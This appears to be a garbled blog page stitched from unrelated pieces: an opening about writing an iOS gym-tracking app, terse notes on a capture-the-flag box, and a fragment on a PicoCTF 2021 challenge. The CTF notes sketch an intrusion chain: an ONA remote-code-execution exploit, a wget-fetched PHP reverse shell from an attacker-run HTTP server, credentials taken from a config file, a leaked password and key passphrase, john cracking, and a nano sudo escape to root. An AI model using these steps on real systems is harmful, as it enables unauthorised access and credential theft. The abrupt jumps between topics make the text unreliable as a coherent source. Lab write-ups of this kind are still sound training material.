Hey all. It’s been awhile since I wrote something. Over the past few weeks,
as I’ve gotten more into The Gym (tm), I’ve also gotten more and more frustrated
with the availability of iOS applications to track exercise goals / progress / etc. including building programs and plate calculations.
Because of this, I decided I’d take a stab at writing my own that suits my exact preferences.
After all, what is a hacker if not a weirdo who just says “screw it, I’ll do it myself?”
user
Scan ports with nc -> http and ssh ports open
/music yields a pre-prod page
contact page
login / create account leads to an ONA dashboard
/artwork yields a different company’s site
similar to the music guy
rabbit hole with nothing useful
Can use RCE exploit from internet to gain reverse sorta shell from ONA (ona specific exploit)
Can use this half-shell to escalate to a full shell
Friend I consulted’s go-to is that most boxes have wget, curl or netcat -> can transfer file rom http to server
python SimpleHTTPServer
netcat 4444 -> listen for requests
make php script correct ports
mkdir www
cd www
cp path/to/php/rev/shell
python -m SimpleHTTPServer
wget http://your.ip.address:portrev/_shell.php (on the half rev. shell)
Now you a full reverse shell
Python3 spawn pty bash for better experience
Database config file found in local/config with DB user and pass
That password allows access to jimmy thru ssh
Pass for jimmy is n1nj4W4rri0R!
Use sftp to transfer linpeas (escalation scanner) onto jimmy’s home dir
./linpeas.sh > output.txt and then less -R output.txt to see linpeas output
/var/www/internal has really interesting writeable files that seem to allow access into Joanna’s id_rsa
ssh tunnel local forward the contents of that folder so that it’s accessible to web
access w/ ssh openadmin -> localhost:2331/index.php
Edit php to cat out joanna’s private key
Crack keyphrase using ssh2john -> john
Bam, ssh into the target as joanna with new key (keyphrase is bloodninjas)
User pwned
root
sudo -l
Can run nano on /opt/priv with nopasswd
Execute a shell from within nano using a GTFOBins as root
Root pwned
keygenme-trial
This challenge is from PicoCTF 2021. It’s labelled “Reverse Engineering,” but I’d regard it as more PWN since traditional RE involves binaries.